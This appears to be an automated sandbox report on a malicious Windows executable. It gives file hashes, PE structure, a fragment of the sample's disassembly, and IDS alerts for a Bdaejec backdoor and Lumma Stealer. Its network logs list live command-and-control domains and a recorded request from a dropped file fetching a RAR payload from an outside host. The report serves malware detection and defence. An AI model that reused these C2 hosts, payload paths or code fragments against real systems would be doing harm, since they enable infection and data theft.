                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.5.2.<./.P.i.
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):4565
                            Entropy (8bit):4.4603162989467195
                            Encrypted:false
                            SSDEEP:48:cvIwWl8zsZJg77aI9VJpqrWpW8VYQYm8M4JgKF9Z+q8mXr9ZXgyId:uIjfrI7ZZ7VsJVbr9lgyId
                            MD5:C97A4F318CCFF48A7CCAC0273AB94467
                            SHA1:68A81AC12206DFFA108C79B30DC551CCD760470D
                            SHA-256:5B0B53D78CE962C0B793E248CD54FBFFB1C73E1E891CFF95A7AAB2E59DEF2C46
                            SHA-512:7ECE8CCE1EDDEA308DA5EB47E074FFC8CF872CEC79F74CECA8AAF285976E57F4E0766BB14F901074B29A5D3EE519C64B47E607EA11C27847D788E5A1829DF52F
                            Malicious:false
                            Reputation:low
                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="425880" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                            Process:C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):4
                            Entropy (8bit):1.5
                            Encrypted:false
                            SSDEEP:3:Nv:9
                            MD5:D3B07384D113EDEC49EAA6238AD5FF00
                            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:foo.
                            Process:C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):4
                            Entropy (8bit):1.5
                            Encrypted:false
                            SSDEEP:3:Nv:9
                            MD5:D3B07384D113EDEC49EAA6238AD5FF00
                            SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                            SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                            SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                            Malicious:false
                            Preview:foo.
                            Process:C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):15872
                            Entropy (8bit):7.031075575407894
                            Encrypted:false
                            SSDEEP:384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
                            MD5:F7D21DE5C4E81341ECCD280C11DDCC9A
                            SHA1:D4E9EF10D7685D491583C6FA93AE5D9105D815BD
                            SHA-256:4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
                            SHA-512:E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 92%
                            Joe Sandbox View:
                            • Filename: Lisect_AVT_24003_G1A_5.exe, Detection: malicious
                            • Filename: Lisect_AVT_24003_G1A_16.exe, Detection: malicious
                            • Filename: LisectAVT_2403002C_193.exe, Detection: malicious
                            • Filename: LisectAVT_2403002C_196.exe, Detection: malicious
                            • Filename: LisectAVT_2403002B_91.exe, Detection: malicious
                            • Filename: LisectAVT_2403002B_492.exe, Detection: malicious
                            • Filename: LisectAVT_2403002B_97.exe, Detection: malicious
                            • Filename: LisectAVT_2403002B_28.exe, Detection: malicious
                            • Filename: LisectAVT_2403002B_351.exe, Detection: malicious
                            • Filename: LisectAVT_2403002B_28.exe, Detection: malicious
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.469053871381083
                            Encrypted:false
                            SSDEEP:6144:dzZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNFjDH5S3:1ZHtBZWOKnMM6bFpDj4
                            MD5:1512CC64868E0D865770FE9F25DBBC5D
                            SHA1:C3E633EE956232620C025EA1F0CA3BE96FE25863
                            SHA-256:F1407F8FFEB3569813B3A31CEE70B3B1C283F3154F36C78656AE95DB11C8ED12
                            SHA-512:4065761C1FC59A7C7DD0AD44D46D723EC574FBB4E6B816DA5201397825AA2FDFE790EA0865E2B4ACCE59DA8368E10C998D7F462FA2EB6285CF98450B73715351
                            Malicious:false
                            Preview:regfI...I....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.()}>.................................................................................................................................................................................................................................................................................................................................................>I........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.761478892341577
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:Lisect_AVT_24003_G1A_72.exe
                            File size:4'900'864 bytes
                            MD5:0140e8aab1d9274870495213cdf82291
                            SHA1:094a5f534dd47158b2e936f1c6bb8351fb3f1706
                            SHA256:61f30e4ff3a0f6c6b50ac05dacc8344ba3ed9911c2888a606e7c15c4ea4a469f
                            SHA512:64b8e54313b7327fb545b25f36151dbe0f7590934a0102e4263db60d1334ecf7a92977fbaba9ec12b65c5a33786fd8f4adf3c621ad9f34432543b4871c0c859a
                            SSDEEP:49152:TrcrVzPIkVly+g20eZJ6qA/9JtYdMP+tL9Cpf9PTIkKgwWyst/lEzAzSgzsvtsof:TkRI6WeZJ6jxRqO4gwgY+SgYKgTBO
                            TLSH:B23623E73211D0E2E46846B4595DA0E15B9A6E3D6E73401AB51F3BCDE7310CDBF0AEA0
                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......e.............................@............@.......................................@.................................F.3.l..
                            Icon Hash:1d9e677775470e9d
                            Entrypoint:0x1104000
                            Entrypoint Section:#bu
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x65CB930E [Tue Feb 13 16:04:30 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:49b6343a7e296cc33dfa349b97649cac
                            Instruction
                            push ebp
                            mov ebp, esp
                            sub esp, 0000016Ch
                            xor eax, eax
                            push ebx
                            push esi
                            push edi
                            mov dword ptr [ebp-24h], eax
                            mov dword ptr [ebp-10h], eax
                            mov dword ptr [ebp-14h], eax
                            mov dword ptr [ebp-08h], eax
                            mov dword ptr [ebp-0Ch], eax
                            mov dword ptr [ebp-20h], eax
                            mov dword ptr [ebp-18h], eax
                            mov dword ptr [ebp-48h], 7577616Ah
                            mov dword ptr [ebp-44h], 58744177h
                            mov dword ptr [ebp-40h], 6578652Eh
                            mov dword ptr [ebp-3Ch], 00000000h
                            call 00007FD21931D805h
                            pop eax
                            add eax, 00000225h
                            mov dword ptr [ebp-04h], eax
                            mov eax, dword ptr fs:[00000030h]
                            mov dword ptr [ebp-28h], eax
                            mov eax, dword ptr [ebp-04h]
                            mov dword ptr [eax], E904C483h
                            mov eax, dword ptr [ebp-04h]
                            mov dword ptr [eax+04h], FFC7C577h
                            mov eax, dword ptr [ebp-28h]
                            mov eax, dword ptr [eax+0Ch]
                            mov eax, dword ptr [eax+1Ch]
                            mov eax, dword ptr [eax]
                            mov eax, dword ptr [eax+08h]
                            mov ecx, dword ptr [eax+3Ch]
                            mov ecx, dword ptr [ecx+eax+78h]
                            add ecx, eax
                            mov edi, dword ptr [ecx+1Ch]
                            mov ebx, dword ptr [ecx+20h]
                            mov esi, dword ptr [ecx+24h]
                            mov ecx, dword ptr [ecx+18h]
                            add esi, eax
                            add edi, eax
                            add ebx, eax
                            xor edx, edx
                            mov dword ptr [ebp-30h], esi
                            mov dword ptr [ebp-1Ch], edx
                            mov dword ptr [ebp-34h], ecx
                            cmp edx, dword ptr [ebp-34h]
                            jnc 00007FD21931D94Eh
                            movzx ecx, word ptr [esi+edx*2]
                            mov edx, dword ptr [ebx+edx*4]
                            mov esi, dword ptr [edi+ecx*4]
                            add edx, eax
                            mov ecx, dword ptr [edx]
                            add esi, eax
                            cmp ecx, 4D746547h
                            jne 00007FD21931D854h
                            cmp dword ptr [edx+04h], 6C75646Fh
                            jne 00007FD21931D84Bh
                            Name | Virtual Address | Virtual Size | Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x33d046 | 0x6c | .imports
                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x33e000 | 0x658fc | .rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                            (unnamed) | 0x1000 | 0x578f3 | 0x27a76 | 65d5c9b7b1dd2822cbe88c7b38bc138c | False | 0.9941202546453066 | data | 7.9668438970178 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            (unnamed) | 0x59000 | 0x1500 | 0xb0b | c2b92bda7759bafbff8a5a3d2140080f | False | 1.0038910505836576 | data | 7.9005521940385615 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            (unnamed) | 0x5b000 | 0x10ef8 | 0xdae8 | 4a5ec8143c371db63b6bc24041decc21 | False | 0.9985546038543898 | data | 7.944942174060495 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            (unnamed) | 0x6c000 | 0xe804 | 0x77d5 | 2caeccb7712d5f61718aff22624f2207 | False | 0.9984027121296085 | data | 7.959679117642671 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            (unnamed) | 0x7b000 | 0x2c1f88 | 0x8165e | 586951d54ef8e4d0ba92c033e6bbab9d | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .imports | 0x33d000 | 0x1000 | 0x200 | c53b7eff20be0e39153ee42ff8b0a5a2 | False | 0.185546875 | data | 1.3699486905026688 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc | 0x33e000 | 0x65a00 | 0x65a00 | 539cdad808cada6701185ef4a2eeefbe | False | 0.09494397678351783 | data | 2.8350695622035795 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .themida | 0x3a4000 | 0x5dc000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .boot | 0x980000 | 0x383200 | 0x383026 | f64ad426b79b71b63d76ea834036c2e7 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            #bu | 0xd04000 | 0x5000 | 0x4200 | 1afc4bcb42c4dabeea8bc2e179808c8a | False | 0.7775804924242424 | data | 6.935155293246564 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                            RT_ICON | 0x33e268 | 0xa068 | Device independent bitmap graphic, 256 x 512 x 4, image size 32768 | Raeto-Romance | Switzerland | 0.1818868108318722
                            RT_ICON | 0x3482e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | Raeto-Romance | Switzerland | 0.3469512195121951
                            RT_ICON | 0x348958 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | Raeto-Romance | Switzerland | 0.4529569892473118
                            RT_ICON | 0x348c50 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | Raeto-Romance | Switzerland | 0.5081967213114754
                            RT_ICON | 0x348e48 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | Raeto-Romance | Switzerland | 0.5709459459459459
                            RT_ICON | 0x348f80 | 0x12428 | Device independent bitmap graphic, 256 x 512 x 8, image size 65536, 256 important colors | Raeto-Romance | Switzerland | 0.07974114878596641
                            RT_ICON | 0x35b3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Raeto-Romance | Switzerland | 0.25826226012793174
                            RT_ICON | 0x35c270 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Raeto-Romance | Switzerland | 0.29106498194945846
                            RT_ICON | 0x35cb28 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Raeto-Romance | Switzerland | 0.23049132947976878
                            RT_ICON | 0x35d0a0 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | Raeto-Romance | Switzerland | 0.06457303902713259
                            RT_ICON | 0x39f0d8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Raeto-Romance | Switzerland | 0.18724066390041494
                            RT_ICON | 0x3a1690 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Raeto-Romance | Switzerland | 0.24648217636022515
                            RT_ICON | 0x3a2748 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Raeto-Romance | Switzerland | 0.32049180327868854
                            RT_ICON | 0x3a30e0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Raeto-Romance | Switzerland | 0.41400709219858156
                            RT_GROUP_ICON | 0x3a3558 | 0xca | data | Raeto-Romance | Switzerland | 0.5792079207920792
                            RT_VERSION | 0x3a3634 | 0x2c8 | data | Raeto-Romance | Switzerland | 0.4943820224719101
                            DLL | Import
                            kernel32.dll | GetModuleHandleA
                            USER32.dll | GetDC
                            GDI32.dll | BitBlt
                            Language of compilation system | Country where language is spoken
                            Raeto-Romance | Switzerland
                            Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
                            2024-07-25T04:58:13.398502+0200 | TCP | 2807908 | ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin | 49713 | 799 | 192.168.2.6 | 44.221.84.105
                            2024-07-25T04:58:16.407005+0200 | UDP | 2050861 | ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (smallrabbitcrossing .site) | 51048 | 53 | 192.168.2.6 | 1.1.1.1
                            2024-07-25T04:58:16.386793+0200 | UDP | 2050856 | ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (snuggleapplicationswo .fun) | 54832 | 53 | 192.168.2.6 | 1.1.1.1
                            2024-07-25T04:58:20.629540+0200 | TCP | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 49717 | 443 | 192.168.2.6 | 13.89.179.12
                            2024-07-25T04:58:16.445372+0200 | UDP | 2050857 | ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (strainriskpropos .store) | 54220 | 53 | 192.168.2.6 | 1.1.1.1
                            2024-07-25T04:58:17.447057+0200 | TCP | 2807908 | ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin | 49715 | 799 | 192.168.2.6 | 44.221.84.105
                            2024-07-25T04:59:07.625811+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49724 | 20.114.59.183 | 192.168.2.6
                            2024-07-25T04:58:12.573742+0200 | UDP | 2838522 | ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup | 54030 | 53 | 192.168.2.6 | 1.1.1.1
                            2024-07-25T04:58:16.431602+0200 | UDP | 2050859 | ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (telephoneverdictyow .site) | 54443 | 53 | 192.168.2.6 | 1.1.1.1
                            2024-07-25T04:58:30.030977+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49719 | 20.114.59.183 | 192.168.2.6
                            2024-07-25T04:58:16.357306+0200 | UDP | 2050858 | ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (theoryapparatusjuko .fun) | 52674 | 53 | 192.168.2.6 | 1.1.1.1
                            2024-07-25T04:58:16.420501+0200 | UDP | 2050860 | ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (punchtelephoneverdi .store) | 56548 | 53 | 192.168.2.6 | 1.1.1.1
                            2024-07-25T04:58:16.306584+0200 | UDP | 2050898 | ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (healthproline .pro) | 56995 | 53 | 192.168.2.6 | 1.1.1.1
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Jul 25, 2024 04:58:12.980428934 CEST | 49713 | 799 | 192.168.2.6 | 44.221.84.105
                            Jul 25, 2024 04:58:12.986148119 CEST | 799 | 49713 | 44.221.84.105 | 192.168.2.6
                            Jul 25, 2024 04:58:12.986224890 CEST | 49713 | 799 | 192.168.2.6 | 44.221.84.105
                            Jul 25, 2024 04:58:12.986789942 CEST | 49713 | 799 | 192.168.2.6 | 44.221.84.105
                            Jul 25, 2024 04:58:12.994493008 CEST | 799 | 49713 | 44.221.84.105 | 192.168.2.6
                            Jul 25, 2024 04:58:13.398428917 CEST | 799 | 49713 | 44.221.84.105 | 192.168.2.6
                            Jul 25, 2024 04:58:13.398502111 CEST | 49713 | 799 | 192.168.2.6 | 44.221.84.105
                            Jul 25, 2024 04:58:13.398541927 CEST | 799 | 49713 | 44.221.84.105 | 192.168.2.6
                            Jul 25, 2024 04:58:13.398616076 CEST | 49713 | 799 | 192.168.2.6 | 44.221.84.105
                            Jul 25, 2024 04:58:13.424463034 CEST | 49713 | 799 | 192.168.2.6 | 44.221.84.105
                            Jul 25, 2024 04:58:13.429507971 CEST | 799 | 49713 | 44.221.84.105 | 192.168.2.6
                            Jul 25, 2024 04:58:17.032901049 CEST | 49715 | 799 | 192.168.2.6 | 44.221.84.105
                            Jul 25, 2024 04:58:17.037956953 CEST | 799 | 49715 | 44.221.84.105 | 192.168.2.6
                            Jul 25, 2024 04:58:17.038073063 CEST | 49715 | 799 | 192.168.2.6 | 44.221.84.105
                            Jul 25, 2024 04:58:17.038465023 CEST | 49715 | 799 | 192.168.2.6 | 44.221.84.105
                            Jul 25, 2024 04:58:17.043425083 CEST | 799 | 49715 | 44.221.84.105 | 192.168.2.6
                            Jul 25, 2024 04:58:17.446909904 CEST | 799 | 49715 | 44.221.84.105 | 192.168.2.6
                            Jul 25, 2024 04:58:17.446959019 CEST | 799 | 49715 | 44.221.84.105 | 192.168.2.6
                            Jul 25, 2024 04:58:17.447057009 CEST | 49715 | 799 | 192.168.2.6 | 44.221.84.105
                            Jul 25, 2024 04:58:20.933195114 CEST | 49715 | 799 | 192.168.2.6 | 44.221.84.105
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Jul 25, 2024 04:58:12.573741913 CEST | 54030 | 53 | 192.168.2.6 | 1.1.1.1
                            Jul 25, 2024 04:58:12.762744904 CEST | 53 | 54030 | 1.1.1.1 | 192.168.2.6
                            Jul 25, 2024 04:58:16.306583881 CEST | 56995 | 53 | 192.168.2.6 | 1.1.1.1
                            Jul 25, 2024 04:58:16.315382957 CEST | 53 | 56995 | 1.1.1.1 | 192.168.2.6
                            Jul 25, 2024 04:58:16.357306004 CEST | 52674 | 53 | 192.168.2.6 | 1.1.1.1
                            Jul 25, 2024 04:58:16.366641998 CEST | 53 | 52674 | 1.1.1.1 | 192.168.2.6
                            Jul 25, 2024 04:58:16.386792898 CEST | 54832 | 53 | 192.168.2.6 | 1.1.1.1
                            Jul 25, 2024 04:58:16.404071093 CEST | 53 | 54832 | 1.1.1.1 | 192.168.2.6
                            Jul 25, 2024 04:58:16.407005072 CEST | 51048 | 53 | 192.168.2.6 | 1.1.1.1
                            Jul 25, 2024 04:58:16.416244030 CEST | 53 | 51048 | 1.1.1.1 | 192.168.2.6
                            Jul 25, 2024 04:58:16.420500994 CEST | 56548 | 53 | 192.168.2.6 | 1.1.1.1
                            Jul 25, 2024 04:58:16.430304050 CEST | 53 | 56548 | 1.1.1.1 | 192.168.2.6
                            Jul 25, 2024 04:58:16.431602001 CEST | 54443 | 53 | 192.168.2.6 | 1.1.1.1
                            Jul 25, 2024 04:58:16.440463066 CEST | 53 | 54443 | 1.1.1.1 | 192.168.2.6
                            Jul 25, 2024 04:58:16.445372105 CEST | 54220 | 53 | 192.168.2.6 | 1.1.1.1
                            Jul 25, 2024 04:58:16.454210997 CEST | 53 | 54220 | 1.1.1.1 | 192.168.2.6
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Jul 25, 2024 04:58:12.573741913 CEST | 192.168.2.6 | 1.1.1.1 | 0xcc24 | Standard query (0) | ddos.dnsnb8.net | A (IP address) | IN (0x0001) | false
                            Jul 25, 2024 04:58:16.306583881 CEST | 192.168.2.6 | 1.1.1.1 | 0x309c | Standard query (0) | healthproline.pro | A (IP address) | IN (0x0001) | false
                            Jul 25, 2024 04:58:16.357306004 CEST | 192.168.2.6 | 1.1.1.1 | 0x9fdb | Standard query (0) | theoryapparatusjuko.fun | A (IP address) | IN (0x0001) | false
                            Jul 25, 2024 04:58:16.386792898 CEST | 192.168.2.6 | 1.1.1.1 | 0x969b | Standard query (0) | snuggleapplicationswo.fun | A (IP address) | IN (0x0001) | false
                            Jul 25, 2024 04:58:16.407005072 CEST | 192.168.2.6 | 1.1.1.1 | 0x98eb | Standard query (0) | smallrabbitcrossing.site | A (IP address) | IN (0x0001) | false
                            Jul 25, 2024 04:58:16.420500994 CEST | 192.168.2.6 | 1.1.1.1 | 0xfab1 | Standard query (0) | punchtelephoneverdi.store | A (IP address) | IN (0x0001) | false
                            Jul 25, 2024 04:58:16.431602001 CEST | 192.168.2.6 | 1.1.1.1 | 0x5e7b | Standard query (0) | telephoneverdictyow.site | A (IP address) | IN (0x0001) | false
                            Jul 25, 2024 04:58:16.445372105 CEST | 192.168.2.6 | 1.1.1.1 | 0x89d8 | Standard query (0) | strainriskpropos.store | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Jul 25, 2024 04:58:12.762744904 CEST | 1.1.1.1 | 192.168.2.6 | 0xcc24 | No error (0) | ddos.dnsnb8.net |  | 44.221.84.105 | A (IP address) | IN (0x0001) | false
                            Jul 25, 2024 04:58:16.315382957 CEST | 1.1.1.1 | 192.168.2.6 | 0x309c | Name error (3) | healthproline.pro | none | none | A (IP address) | IN (0x0001) | false
                            Jul 25, 2024 04:58:16.366641998 CEST | 1.1.1.1 | 192.168.2.6 | 0x9fdb | Name error (3) | theoryapparatusjuko.fun | none | none | A (IP address) | IN (0x0001) | false
                            Jul 25, 2024 04:58:16.404071093 CEST | 1.1.1.1 | 192.168.2.6 | 0x969b | Name error (3) | snuggleapplicationswo.fun | none | none | A (IP address) | IN (0x0001) | false
                            Jul 25, 2024 04:58:16.416244030 CEST | 1.1.1.1 | 192.168.2.6 | 0x98eb | Name error (3) | smallrabbitcrossing.site | none | none | A (IP address) | IN (0x0001) | false
                            Jul 25, 2024 04:58:16.430304050 CEST | 1.1.1.1 | 192.168.2.6 | 0xfab1 | Name error (3) | punchtelephoneverdi.store | none | none | A (IP address) | IN (0x0001) | false
                            Jul 25, 2024 04:58:16.440463066 CEST | 1.1.1.1 | 192.168.2.6 | 0x5e7b | Name error (3) | telephoneverdictyow.site | none | none | A (IP address) | IN (0x0001) | false
                            Jul 25, 2024 04:58:16.454210997 CEST | 1.1.1.1 | 192.168.2.6 | 0x89d8 | Name error (3) | strainriskpropos.store | none | none | A (IP address) | IN (0x0001) | false
                            • ddos.dnsnb8.net:799
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.6 | 49713 | 44.221.84.105 | 799 | 5352 | C:\Users\user\AppData\Local\Temp\jawuwAtX.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Jul 25, 2024 04:58:12.986789942 CEST | 288 | OUT | GET /cj//k1.rar HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
